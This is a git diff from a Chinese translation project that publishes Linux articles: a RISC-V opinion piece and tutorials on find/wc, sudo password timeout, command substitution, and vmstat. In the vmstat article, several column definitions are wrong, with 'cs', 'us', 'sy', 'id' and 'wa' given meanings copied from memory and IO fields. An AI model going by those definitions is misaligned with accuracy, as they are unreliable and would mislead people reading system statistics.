Facebook 和 Google 等上关注我。 + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/display-linux-command-history-with-date-and-time/ + +作者:[Ravi Saive][a] +译者:[Hymantin](https://github.com/Hymantin) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/admin/ +[1]:http://www.tecmint.com/history-command-examples/ +[2]:http://www.tecmint.com/wp-content/uploads/2017/01/Linux-History-Command.png +[3]:http://www.tecmint.com/history-command-examples/ +[4]:http://www.tecmint.com/sort-ls-output-by-last-modified-date-and-time/ +[5]:http://www.tecmint.com/wp-content/uploads/2017/01/Set-Date-and-Time-on-Linux-Commands-History.png diff --git a/published/201701/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md b/published/201701/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md new file mode 100644 index 0000000000..2e3f35f21b --- /dev/null +++ b/published/201701/20170116 Can RISC-V - Linux of Microprocessors - Start an Open Hardware Renaissance.md @@ -0,0 +1,45 @@ +RISC-V,微处理器中的 Linux :它会开启一个开源硬件的文艺复兴么? +============================================================ + +![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/riscv2-1122x812.png) + + +我与许多人分享过一个愿景,我们很快就能使用由开源硬件([OSH][1])和开源软件所驱动的现代而强大的设备。 + +开放硬件是那种有完整的文档,并且可以根据你的需求自由使用、研究、修改和复制的设备。它从原理图到 PCB 布局的所有内容全都是公开的,包括驱动硬件的软件。近年来有所进步,有更多的硬件被开放了,但是我们的 PC 和其它设备中的微处理器却被限制在了桌面端的以 x86 为主导的、封闭的指令集架构([ISA][2]),或者智能手机/平板设备上的 ARM 变体。这两个指令集架构都是闭源的,并且不能用于开放设备。此外,许多广泛使用的 ARM 实现,比如 A9 或 Snapdragon 在这些已经专有的指令集架构上添加了进一步的专有层。 + +[RISC-V][3] 是不同的。在加州大学伯克利分校的研究人员于 2010 年推出的 RISC-V(发音 risk-five)是根据同样的初始 [RISC][4](精简指令集计算(Reduced Instruction Set Computing)) CPU 设计构建的,其基础是其它熟悉的指令集架构,如 ARM、MIPS、PowerPC 和 SPARC,但目的是开放且不受专利保护(注意:目前,RISC-V 规范仅供私人或教育用途使用,计划在将来完全开放)。RISC 设计策略与 x86 系列的复杂指令集计算(CISC)设计相反。 + +虽然 RISC-V 不是现有唯一的开放指令集架构,但它是唯一一个极速推进的。指导指令集架构的开发和采用的 RISC-V 基金会有一些相当大的捐赠者,如 Oracle、Western Digital、HP、Google、IBM 和 Nvidia。我可以看到名单上缺少的几个著名的芯片制造商。似乎大的玩家们已经意识到,与软件一样,硬件会在开放下发展得更快更好。而且,任何人使用它你都不必付费。因为开发中的困难和成本,像这样的项目并没有被更快取得成功。现在,一个公开的结果是大的公司正在跟进,开发资金正在源源而来。 + +RISC-V 在学术界也有很多支持。从在伯克利的孵化到在世界范围内超过 35 个大学项目协助其发展,在那里不缺乏聪明的头脑为这个项目工作。 + +在其背后也有进展。在软件方面,人们正在将程序移植到 RISC-V 上,让它启动起来。Fedora 已经移植了成千上万的程序 - 下面是 [Fedora/RISC-V][5] 在 QEMU 中启动: + + ![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/booting-500x664.gif) + +*向 Richard WM Jones 做出这么棒的动画致敬* + +在硬件方面,人们正在制造开发板。HiFive1 是一个成功众筹的项目,它是来自 SiFive 的一块 Arduino 板,由他们的 FE310 SoC 驱动,这是一块 32 位的 RISC-V 芯片,运行频率为 320+ MHz。 它会在 2 月发货,你可以[在这里][6]预订一个,价格为 $59。 + +![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/si5-640x457.jpg) + +这一切听起来很棒 - 我希望他们能够交付,因为我们都将从中受益非浅。如果可以,请支持这个项目。告诉人们这个东西。购买一块 HiFive1,看看它上面运行了什么。我在你的未来看到了这些芯片。 + +-------------------------------------------------------------------------------- + +via: https://www.darrentoback.com/can-risc-v-linux-of-microprocessors-start-an-open-hardware-renaissance + +作者:[dmt][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.darrentoback.com/about-me +[1]:https://en.wikipedia.org/wiki/Open-source_hardware +[2]:https://en.wikipedia.org/wiki/Comparison_of_instruction_set_architectures +[3]:https://en.wikipedia.org/wiki/RISC-V +[4]:https://en.wikipedia.org/wiki/Reduced_instruction_set_computing +[5]:https://fedoraproject.org/wiki/Architectures/RISC-V +[6]:https://www.crowdsupply.com/sifive/hifive1/ diff --git a/translated/tech/20170117 How to Find Number of Files in a Directory and Subdirectories.md b/published/201701/20170117 How to Find Number of Files in a Directory and Subdirectories.md similarity index 68% rename from translated/tech/20170117 How to Find Number of Files in a Directory and Subdirectories.md rename to published/201701/20170117 How to Find Number of Files in a Directory and Subdirectories.md index 3ea2a4f521..6a9d069366 100644 --- a/translated/tech/20170117 How to Find Number of Files in a Directory and Subdirectories.md +++ b/published/201701/20170117 How to Find Number of Files in a Directory and Subdirectories.md @@ -1,41 +1,44 @@ -如何知道目录和子目录下文件的数量 +如何知道目录及子目录下文件的数量 ============================================================ -在本指南中,我们将介绍如何在 Linux 系统上显示当前工作目录或任何其他目录及其子目录中的文件数量。 +在本指南中,我们将介绍如何在 Linux 系统上显示当前工作目录或任何目录及其子目录中的文件数量。 -我们将使用[ find 命令][6],它用于搜索目录层次结构中的文件以及[ wc 命令][7],它会打印每个文件或标准输入的换行符、单词和字节计数。 +我们将使用 [find 命令][6],它用于搜索目录层次结构中的文件,以及 [wc 命令][7],它会打印每个文件或来自标准输入的换行符、单词和字节计数。 -以下是我们可以使用[ find 命令][8]的选项,如下所示: +以下是我们在 [find 命令][8]中使用的选项,如下所示: -1. `-type` - 指定要搜索的文件类型,在上面的情况下,`f`表示查找所有常规文件。 +1. `-type` - 指定要搜索的文件类型,在上面的情况下,`f` 表示查找所有常规文件。 2. `-print` - 打印文件绝对路径。 -3. `-l` - 此选项打印换行符的总数,等于由[ find 命令][1]输出的绝对文件路径总数。 -find 命令的一般语法。 +以下是我们 [wc 命令][8]中使用的选项,如下所示: + +1. `-l` - 此选项打印换行符的总数,也即由 [find 命令][1]输出的绝对文件路径总数。 + +`find` 命令的一般语法。 ``` # find . -type f -print | wc -l $ sudo find . -type f -print | wc -l ``` -重要:使用[ sudo 命令][9]读取指定目录中的所有文件,包括具有超级用户权限的子目录中的文件,以避免 “Permission denied” 错误,如下截图所示: +重要:使用 [sudo 命令][9]来读取指定目录中的所有文件,包括具有超级用户权限的子目录中的文件,以避免 “Permission denied” 错误,如下截图所示: [ ![Find Number of Files in Linux](http://www.tecmint.com/wp-content/uploads/2017/01/Find-Number-of-Files-in-Linux.png) ][10] -Linux 中的文件数量 +*Linux 中的文件数量* -你可以看到,在上面的第一个命令中,find 命令没有读取当前工作目录中的所有文件。 +你可以看到,在上面的第一个命令中,`find` 命令没有读取当前工作目录中的所有文件。 -下面是额外的示例,分别显示 `/var/log` 和 `/etc` 目录中的常规文件总数: +下面是更多的示例,分别显示 `/var/log` 和 `/etc` 目录中的常规文件总数: ``` $ sudo find /var/log/ -type f -print | wc -l $ sudo find /etc/ -type f -print | wc -l ``` -有关Linux find 和 wc 命令的更多示例,请查看以下系列文章以了解其他使用选项,提示和相关命令: +有关 Linux 中 `find` 和 `wc` 命令的更多示例,请查看以下系列文章以了解其他使用选项,提示和相关命令: 1. [35 个 Linux 中的 “find” 命令示例][2] 2. [如何在 Linux 中查找最近或今天的修改的文件][3] @@ -58,7 +61,7 @@ via: http://www.tecmint.com/find-number-of-files-in-directory-subdirectories-lin 作者:[Aaron Kili][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md b/published/201701/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md similarity index 51% rename from translated/tech/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md rename to published/201701/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md index 2c6ad2b08e..34ed8d378b 100644 --- a/translated/tech/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md +++ b/published/201701/20170118 How to Keep ‘sudo’ Password Timeout Session Longer in Linux.md @@ -1,15 +1,15 @@ -如何在 Linux 让 ‘sudo’ 密码会话超时更长些 +如何在 Linux 中让 sudo 密码会话的超时更长些 ============================================================ -在最近的文章中,我们向你展示了[ Linux 中的 10 个有用的 sudoers 配置][1]以及[让 sudo 在输入不正确的密码时冒犯你][2],在本文中,我们发现了另一个 sudo 贴士,在 Ubuntu Linux 中使 sudo 密码会话(超时)更长或更短。 +在最近的文章中,我们向你展示了 在 Linux 中设置 sudo 的十条 sudoers 实用配置][1]以及[让 sudo 在你输入错误的密码时“嘲讽”你][2],在本文中,我们发现了另一个 sudo 贴士,在 Ubuntu Linux 中使 sudo 密码会话(超时)更长或更短。 -在 Ubuntu 及其衍生版如 Linux Mint 或任何其他基于 Ubuntu 的发行版中,当你执行 [sudo command][3] 时,它将提示你输入管理密码。 +在 Ubuntu 及其衍生版如 Linux Mint 或任何其他基于 Ubuntu 的发行版中,当你执行 [sudo 命令][3] 时,它将提示你输入管理密码。 在第一次执行 sudo 命令后,默认情况下密码将保持 15 分钟,因此你不需要为每个 sudo 命令键入密码。 -如果,你因为某种原因觉得 15 分钟太长或太短,你可以在 sudoers 文件中做一个简单的调整。 +如果,你因为某种原因觉得 15 分钟太长或太短,你可以在 `sudoers` 文件中做一个简单的调整。 -要设置 sudo 密码超时值,请使用 `passwd_timeout` 参数。首先使用 sudo 和 visudo 命令以超级用户权限打开 /etc/sudoers 文件,如下所示: +要设置 sudo 密码超时值,请使用 `passwd_timeout` 参数。首先使用 `sudo` 和 `visudo` 命令以超级用户权限打开 `/etc/sudoers` 文件,如下所示: ``` $ sudo visudo @@ -21,19 +21,19 @@ $ sudo visudo Defaults env_reset,timestamp_timeout=20 ``` -注意:你可以马上设置任何所需的时间,并确保在超时之前等待。 如果要为每个执行的 sudo 命令弹出密码提示,你也可以将时间设置为0,或者通过设置值 `-1` 永久禁用密码提示。 +注意:你可以以分钟设置为你所需的任何时间,它会在超时之前一直等待。 如果要为每个执行的 sudo 命令弹出密码提示,你也可以将时间设置为 `0`,或者通过设置值 `-1` 永久禁用密码提示。 -下面的截图显示了我在 /etc/sudoers 文件中设置的默认参数。 +下面的截图显示了我在 `/etc/sudoers` 文件中设置的默认参数。 [ ![Change sudo Password Timeout](http://www.tecmint.com/wp-content/uploads/2017/01/set-sudo-password-timeout-session.png) ][4] -改变 sudo 密码超时 +*改变 sudo 密码超时* -按 `[Ctrl + O]` 保存文件,然后使用 `[Ctrl + X]` 退出。 然后,使用 sudo 运行命令并等待 2 分钟以检查密码提示是否超时以测试设置是否正常。 +按 `Ctrl + O` 保存文件,然后使用 `Ctrl + X` 退出。 然后,使用 `sudo` 运行命令并等待 2 分钟以检查密码提示是否超时以测试设置是否正常。 -在本篇中,我们解释了如何设置 sudo 密码提示超时之前的分钟数,记得在评论栏分享你对这篇文章的想法或者其他[对系统管理员配置有用的 sudo 配置][5]。 +在本篇中,我们解释了如何设置 `sudo` 密码提示超时之前的分钟数,记得在评论栏分享你对这篇文章的想法或者其他[对系统管理员配置有用的 sudo 配置][5]。 -------------------------------------------------------------------------------- @@ -43,19 +43,19 @@ Defaults env_reset,timestamp_timeout=20 Aaron Kili 是 Linux 和 F.O.S.S 爱好者,将来的 Linux SysAdmin 以及 web 开发人员,目前是 TecMint 的内容创建者,他喜欢用电脑工作,并坚信分享知识。 - +----- via: http://www.tecmint.com/set-sudo-password-timeout-session-longer-linux/ 作者:[Aaron Kili ][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]:http://www.tecmint.com/author/aaronkili/ -[1]:http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ -[2]:http://www.tecmint.com/sudo-insult-when-enter-wrong-password/ +[1]:https://linux.cn/article-8145-1.html +[2]:https://linux.cn/article-8128-1.html [3]:http://www.tecmint.com/su-vs-sudo-and-how-to-configure-sudo-in-linux/ [4]:http://www.tecmint.com/wp-content/uploads/2017/01/set-sudo-password-timeout-session.png [5]:http://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/ diff --git a/translated/tech/20170119 How To Assign Output of a Linux Command to a Variable.md b/published/201701/20170119 How To Assign Output of a Linux Command to a Variable.md similarity index 67% rename from translated/tech/20170119 How To Assign Output of a Linux Command to a Variable.md rename to published/201701/20170119 How To Assign Output of a Linux Command to a Variable.md index d0dbe38b35..fff397f52f 100644 --- a/translated/tech/20170119 How To Assign Output of a Linux Command to a Variable.md +++ b/published/201701/20170119 How To Assign Output of a Linux Command to a Variable.md @@ -1,16 +1,16 @@ 如何将 Linux 命令的输出赋值给变量 ================================== -每当你运行一个命令,它都出在屏幕上输出一些内容:该命令的期望结果或者该命令执行细节的状态/错误消息。有些时候,你可能想要将某个命令的输出内容存储在一个变量中,以待在后续操作中取出来使用。 +运行一条命令时,它都会产生某种输出:要么是该命令的期望结果,或者是该命令执行细节的状态/错误消息。有些时候,你可能想要将某个命令的输出内容存储在一个变量中,以待在后续操作中取出来使用。 本文将介绍将 shell 命令赋值给变量的不同方法,这对于 shell 脚本编程是特别有用的。 -你可以使用如下的 shell 命令置换特性来将命令的输出存储到变量中: +可以使用如下形式的 shell 命令置换特性,将命令的输出存储到变量中: ``` 变量名=$(命令) 变量名=$(命令 [命令选项 ...] 参数1 参数2 ...) -或者: +或者: 变量名='命令' 变量名='命令 [命令选项 ...] 参数1 参数2 ...' ``` @@ -23,13 +23,13 @@ $ CURRENT_USERS=$(who) ``` -然后,我们可以使用 [echo 命令][1] 来使用上述变量,如下: +然后,我们可以使用 [echo 命令][1] 显示一个句子并使用上述变量,如下: ``` $ echo -e "以下为登录到系统中的用户:\n\n $CURRENT_USERS" ``` -上面的命令中:`-e` 标记表示解释所有的转义序列 (如 `\n` 为换行)。为节约时间和内存,通常在 [echo 命令][2] 中使用命令置换特性,如下: +上面的命令中:`-e` 标记表示解释所有的转义序列 (如 `\n` 为换行)。为节约时间和内存,通常在 [echo 命令][2] 中直接使用命令置换特性,如下: ``` $ echo -e "以下为登录到系统中的用户:\n\n $(who)" @@ -37,9 +37,9 @@ $ echo -e "以下为登录到系统中的用户:\n\n $(who)" [![显示当前登录系统的用户](http://www.tecmint.com/wp-content/uploads/2017/01/Shows-Current-Logged-Users-in-Linux.png)][3] -在 Linux 中显示当前登录系统的用户 +*在 Linux 中显示当前登录系统的用户* -接下来,为了演示刚刚的第二种形式,我们以把当前工作目录下文件数存储到变量 `FILES` 为了,然后使用 echo 来输出,如下: +接下来,为了演示上面提到的第二种形式,我们以把当前工作目录下文件数存储到变量 `FILES` ,然后使用 **echo** 来输出,如下: ``` $ FILES=`sudo find . -type f -print | wc -l` @@ -47,9 +47,9 @@ $ echo "当前目录有 $FILES 个文件。" ``` [![显示目中包含文件的数量](http://www.tecmint.com/wp-content/uploads/2017/01/Show-Number-of-Files-in-Directory.png)][4] -显示目中包含文件的数量 +*显示目中包含文件的数量* -至此,文毕。我们展示了将 shell 命令的输出赋值给变量的方法。你可以在下边的评论反馈区留下你的想法。 +就是这些了。我们展示了将 shell 命令的输出赋值给变量的方法。你可以在下边的评论反馈区留下你的想法。 --------------------------------------------------------- @@ -57,7 +57,7 @@ $ echo "当前目录有 $FILES 个文件。" ![](http://1.gravatar.com/avatar/4e444ab611c7b8c7bcb76e58d2e82ae0?s=128&d=blank&r=g) -Aaron Kili 是一名 Linux 和 F.O.S.S 忠实拥护者、高级 Linux 系统管理员、Web 开发者,目前在 TecMint 是一名活跃的博主,热衷于计算机并有着强烈的只是分享意愿。 +Aaron Kili 是一名 Linux 和 F.O.S.S 忠实拥护者、未来的 Linux 系统管理员、Web 开发者,目前是 TecMint 的原创作者,热衷于计算机并乐于知识分享。 译者简介: ![GHLandy](http://GHLandy.com/images/GHLandy.ico) @@ -70,7 +70,7 @@ via: http://www.tecmint.com/assign-linux-command-output-to-variable/ 作者:[Aaron Kili][a] 译者:[GHLandy](https://github.com/GHLandy) -校对:[校对者ID](https://github.com/校对者ID) +校对:[jasminepeng](https://github.com/jasminepeng) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/201701/20170120 vmstat – A Standard Nifty Tool to Report Virtual Memory Statistics.md b/published/201701/20170120 vmstat – A Standard Nifty Tool to Report Virtual Memory Statistics.md new file mode 100644 index 0000000000..2eabbface1 --- /dev/null +++ b/published/201701/20170120 vmstat – A Standard Nifty Tool to Report Virtual Memory Statistics.md @@ -0,0 +1,335 @@ +vmstat:一个标准的报告虚拟内存统计工具 +============================================================ + +### 什么是 RAM? + +在智能手机世界,我们每一个人都知道 RAM。因此,我不想深入介绍,这样我就简要概括下。RAM 代表“随机访问内存”(Random Access Memory),是一种计算机数据存储,它会存储经常使用的程序来提升系统性能。 + +### 什么是虚拟内存? + +虚拟内存是一种内存管理方式,计算机通过临时将最近未使用的程序数据从 RAM 转移到硬盘,以平衡或管理内存的短缺。 + +### 什么是 vmstat? + +vmstat 是一个标准的工具,它会报告 Linux 系统的虚拟内存统计。vmstat 会报告有关进程、内存、分页、块 IO、陷阱(中断)和 cpu 活动的信息。它可以帮助 Linux 管理员在解决问题时识别系统瓶颈。 + +### 在 Linux 中安装 Sysstat + +Linux 中没有独立的 `vmstat` 包。它与 `sysstat` 绑定在一起,并在大多数发行版的默认仓库上都有。如果还没有安装,只要基于你的发行版输入下面的命令。 + +``` +[在 CentOS/RHEL 中安装 vmstat] +$ sudo yum install sysstat + +[在 Fedora 中安装 vmstat] +$ sudo dnf install sysstat + +[在 Debian/Ubuntu 中安装 vmstat] +$ sudo apt-get install sysstat + +[在 Arch Linux 中安装 vmstat] +$ sudo pacman -S sysstat + +[在 Mageia 中安装 vmstat] +$ sudo urpmi sysstat + +[在 openSUSE 中安装 vmstat] +$ sudo zypper install sysstat +``` + +### 不带参数运行 vmstat + +假设你已经成功安装 vmstat,在终端中不带参数运行 `vmstat`,它会向你展示 vmstat 的默认结果。 + +``` +# vmstat +procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- + r b swpd free buff cache si so bi bo in cs us sy id wa + 2 0 79496 1614120 139240 787928 0 0 23 10 0 0 11 1 88 0 +``` + +当你看到上面的输出,你可能已经大致了解了它是什么以及它的目的。不要担心,我们将深入解释每个参数,以便你可以了解 vmstat 的用途和目的。 + +`procs`:procs 中有 `r` 和 `b` 列,它报告进程统计信息。在上面的输出中,在运行队列(`r`)中有两个进程在等待 CPU 并有零个休眠进程(`b`)。通常,它不应该超过处理器(或核心)的数量,如果你发现异常,最好使用 [top 命令][1]进一步地排除故障。 + +* `r`:等待运行的进程数。 +* `b`:休眠状态下的进程数。 + +`memory`: memory 下有报告内存统计的 `swpd`、`free`、`buff` 和 `cache` 列。你可以用 `free -m` 命令看到同样的信息。在上面的内存统计中,统计数据以千字节表示,这有点难以理解,最好添加 `M` 参数来看到以兆字节为单位的统计数据。 + +* `swpd`:使用的虚拟内存量。 +* `free`:空闲内存量。 +* `buff`:用作缓冲区的内存量。 +* `cache`:用作高速缓存的内存量。 +* `inact`:非活动内存的数量。 +* `active`:活动内存量。 + +`swap`:swap 有 `si` 和 `so` 列,用于报告交换内存统计信息。你可以用 `free -m` 命令看到相同的信息。 + +* `si`:从磁盘交换的内存量(换入,从 swap 移到实际内存的内存)。 +* `so`:交换到磁盘的内存量(换出,从实际内存移动到 swap 的内存)。 + +`I/O`:I/O 有 `bi` 和 `bo` 列,它以“块读取”和“块写入”的单位来报告每秒磁盘读取和写入的块的统计信息。如果你发现有巨大的 I/O 读写,最好使用 [iotop][2] 和 [iostat][3] 命令来查看。 + +* `bi`:从块设备接收的块数。 +* `bo`:发送到块设备的块数。 + +`system`:system 有 `in` 和 `cs` 列,它报告每秒的系统操作。 + +* `in`:每秒的系统中断数,包括时钟中断。 +* `cs`:发送到块设备的块数。 + +`CPU`:CPU 有 `cs`、`us`、`sy`、`id` 和 `wa` 列,报告(所用的) CPU 资源占总 CPU 时间的百分比。如果你发现异常,最好使用 `top` 和 `free` 命令。 + +* `cs`:每秒的系统中断数,包括时钟。 +* `us`:发送到块设备的块数。 +* `sy`:用作高速缓存的内存量。 +* `id`:非活动内存量。 +* `wa`:活动内存量。 + +### 以 MB 方式输出 + +默认情况下,vmstat 以千字节为单位显示内存统计,这是非常难以理解的,最好添加 `-S m` 参数以获取以兆字节为单位的统计。 + +``` +# vmstat -S m +procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- + r b swpd free buff cache si so bi bo in cs us sy id wa + 1 0 103 371 406 2116 0 0 40 15 0 0 11 1 87 0 +``` + +### 以延迟方式运行 vmstat 获取更好的统计信息 + +默认情况下,vmstat 的单次统计信息不足以进一步进行故障排除,因此,添加更新延迟(延迟是更新之间的延迟,以秒为单位)以定期捕获活动。如果你想以 2 秒延迟运行 vmstat ,只需使用下面的命令(如果你想要更长的延迟,你可以根据你的愿望改变)。 + +以下命令将每 2 秒运行一次,直到退出。 + +``` +# vmstat 2 +procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- + r b swpd free buff cache si so bi bo in cs us sy id wa + 1 0 105500 325776 416016 2166912 0 0 40 15 0 0 11 1 87 0 + 0 0 105500 325644 416016 2166920 0 0 0 13 1083 1174 11 1 87 0 + 0 0 105500 308648 416024 2166928 0 0 1 16 1559 1453 16 2 82 0 + 0 0 105500 285948 416032 2166932 0 0 0 12 934 1003 9 1 90 0 + 0 0 105500 326620 416040 2166940 0 0 1 27 922 1068 9 1 90 0 + 0 0 105500 366704 416048 2166944 0 0 0 17 835 955 9 1 90 0 + 0 0 105500 366456 416056 2166948 0 0 1 22 859 918 9 1 90 0 + 0 0 105500 366456 416056 2166948 0 0 0 15 1539 1504 17 2 81 0 + 0 0 105500 365224 416060 2166996 0 0 1 19 984 1097 11 1 88 0 +``` + +### 带延迟和计数运行 vmstat + +或者,你可以带延迟和特定计数运行 vmstat,一旦达到给定的计数,然后自动退出。 + +以下命令将每 2 秒运行一次,10 次后自动退出。 + +``` +# vmstat 2 10 +procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- + r b swpd free buff cache si so bi bo in cs us sy id wa + 1 0 79496 1581916 157380 810412 0 0 23 10 0 1 11 1 88 0 + 2 0 79496 1559464 157380 810416 0 0 1 1 1821 1749 21 2 77 0 + 0 0 79496 1583768 157384 810416 0 0 1 46 681 799 9 1 90 0 + 2 0 79496 1556364 157384 810428 0 0 1 1 1392 1545 15 2 83 0 + 0 0 79496 1583272 157384 810428 0 0 1 0 1307 1448 14 2 84 0 + 2 0 79496 1582032 157384 810428 0 0 1 41 424 605 4 1 96 0 + 1 0 79496 1575848 157384 810428 0 0 1 0 1912 2407 26 2 71 0 + 0 0 79496 1582884 157384 810436 0 0 1 69 678 825 9 1 90 0 + 2 0 79496 1569368 157392 810432 0 0 11 26 920 969 9 1 90 0 + 1 0 79496 1583612 157400 810444 0 0 7 39 2001 2530 20 2 77 0 +``` + +### 显示活动和非活动内存 + +默认情况下,vmstat 会显示除活动和非活动内存之外的内存统计信息。如果要查看活动和非活动内存统计信息,请在 vmstat 后添加 `-a` 参数。 + +``` +# vmstat -a +procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- + r b swpd free inact active si so bi bo in cs us sy id wa + 1 0 105500 2387592 415148 584112 0 0 40 15 0 1 11 1 87 0 +``` + +### 打印磁盘统计 + +在 vmstat 后面添加 `-d` 参数会以每个磁盘一行的方式显示统计(包含读、写和 IO)。 + +``` +# vmstat -d +disk- ------------reads------------ ------------writes----------- -----IO------ + total merged sectors ms total merged sectors ms cur sec +ram0 0 0 0 0 0 0 0 0 0 0 +ram1 0 0 0 0 0 0 0 0 0 0 +ram2 0 0 0 0 0 0 0 0 0 0 +ram3 0 0 0 0 0 0 0 0 0 0 +ram4 0 0 0 0 0 0 0 0 0 0 +ram5 0 0 0 0 0 0 0 0 0 0 +ram6 0 0 0 0 0 0 0 0 0 0 +ram7 0 0 0 0 0 0 0 0 0 0 +ram8 0 0 0 0 0 0 0 0 0 0 +ram9 0 0 0 0 0 0 0 0 0 0 +ram10 0 0 0 0 0 0 0 0 0 0 +ram11 0 0 0 0 0 0 0 0 0 0 +ram12 0 0 0 0 0 0 0 0 0 0 +ram13 0 0 0 0 0 0 0 0 0 0 +ram14 0 0 0 0 0 0 0 0 0 0 +ram15 0 0 0 0 0 0 0 0 0 0 +loop0 0 0 0 0 0 0 0 0 0 0 +loop1 0 0 0 0 0 0 0 0 0 0 +loop2 0 0 0 0 0 0 0 0 0 0 +loop3 0 0 0 0 0 0 0 0 0 0 +loop4 0 0 0 0 0 0 0 0 0 0 +loop5 0 0 0 0 0 0 0 0 0 0 +loop6 0 0 0 0 0 0 0 0 0 0 +loop7 0 0 0 0 0 0 0 0 0 0 +fd0 0 0 0 0 0 0 0 0 0 0 +sda 16604050 904497 2594882190 57455732 30037054 28093770 2160032056 118189160 0 40915 +sdb 257357577 479985 3124712204 577235320 8502519 1283237 36645890 11250948 0 182336 +``` + +### 总结磁盘统计 + +在 vmstat 后面添加 `-D` 会显示全局统计(包括全部的磁盘、分区、全部读、合并的读、读取的扇区、写、合并的写、写入的扇区和 IO)。 + +``` +# vmstat -D + 27 disks + 3 partitions + 275754028 total reads + 1388030 merged reads + 5751195976 read sectors + 638710116 milli reading + 38795040 writes + 29520659 merged writes + 2209820333 written sectors + 130210652 milli writing + 0 inprogress IO + 224704 milli spent IO +``` + +### 打印指定分区统计 + +vmstat 添加 `-p` 参数后面跟上设备名会显示指定分区统计(包括读、读取的扇区、写以及请求的写)。 + +``` +# vmstat -p /dev/sdb1 +sdb1 reads read sectors writes requested writes + 3115 27890 839453 206728016 +``` + +### vmstat 统计信息带上时间戳 + +当你想在特定时间区间内找到内存尖峰时,用 vmstat 命令添加 `-t` 参数,后跟延迟和计数。 + +注意:此组合不适用于基于 Debian 的系统。 + +``` +# vmstat -t 1 5 +procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------ ---timestamp--- + r b swpd free buff cache si so bi bo in cs us sy id wa st + 0 0 0 6981416 181324 24588604 0 0 0 1 0 0 0 0 100 0 0 2017-01-11 15:42:15 MST + 2 0 0 6981276 181324 24588604 0 0 0 0 91 40 0 0 100 0 0 2017-01-11 15:42:16 MST + 0 0 0 6982016 181324 24588604 0 0 0 0 75 116 0 0 100 0 0 2017-01-11 15:42:17 MST + 0 0 0 6982016 181324 24588604 0 0 0 0 43 39 0 0 100 0 0 2017-01-11 15:42:18 MST + 0 0 0 6982280 181324 24588604 0 0 0 0 113 185 0 0 100 0 0 2017-01-11 15:42:19 MST +``` + +### 打印更多统计 + +vmstat 后面跟上 `-s` 参数会显示不同统计的总结。 + +``` +# vmstat -s + 32849392 total memory + 25864128 used memory + 16468180 active memory + 8320888 inactive memory + 6985264 free memory + 181324 buffer memory + 24588612 swap cache + 20970492 total swap + 0 used swap + 20970492 free swap + 891075 non-nice user cpu ticks + 6532 nice user cpu ticks + 1507099 system cpu ticks + 18925265601 idle cpu ticks + 113043 IO-wait cpu ticks + 108 IRQ cpu ticks + 4185 softirq cpu ticks + 0 stolen cpu ticks + 4071862 pages paged in + 216759718 pages paged out + 0 pages swapped in + 0 pages swapped out + 369611221 interrupts + 477861261 CPU context switches + 1478258826 boot time + 2196121 forks +``` + +### 打印 slab 统计 + +vmstat 后面跟上 `-m` 参数会显示 slab 信息。 + +``` +# vmstat -m +Cache Num Total Size Pages +nf_conntrack_expect 0 0 240 16 +nf_conntrack_ffffffff81b2a920 18 60 312 12 +fib6_nodes 24 59 64 59 +ip6_dst_cache 16 30 384 10 +ndisc_cache 7 30 256 15 +ip6_mrt_cache 0 0 128 30 +RAWv6 35 35 1088 7 +UDPLITEv6 0 0 1024 4 +UDPv6 4 12 1024 4 +tw_sock_TCPv6 0 0 320 12 +request_sock_TCPv6 0 0 192 20 +TCPv6 4 6 1920 2 +fat_inode_cache 5 6 672 6 +fat_cache 0 0 32 112 +ioat2 4096 4140 128 30 +ext4_inode_cache 34322 34364 1000 4 +ext4_xattr 0 0 88 44 +. +. +. +``` + +### 阅读更多关于 vmstat + +如果你想了解关于 vmstat 的更多选项,请阅读手册。 + +``` +# vmstat --help +或者 +# man vmstat +``` + +-------------------------------------------------------------------------------- + +作者简介: + +![](http://1.gravatar.com/avatar/d487bef1de15143a7b80a40396e96118?s=256&d=mm&r=g) + +热爱玩所有的 Linux 发行版 + +-------------------------------------------------------------------------------- + +via: http://www.2daygeek.com/linux-vmstat-command-examples-tool-report-virtual-memory-statistics/ + +作者:[Magesh Maruthamuthu][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.2daygeek.com/author/magesh/ +[1]:http://www.2daygeek.com/top-command-examples-to-monitor-server- 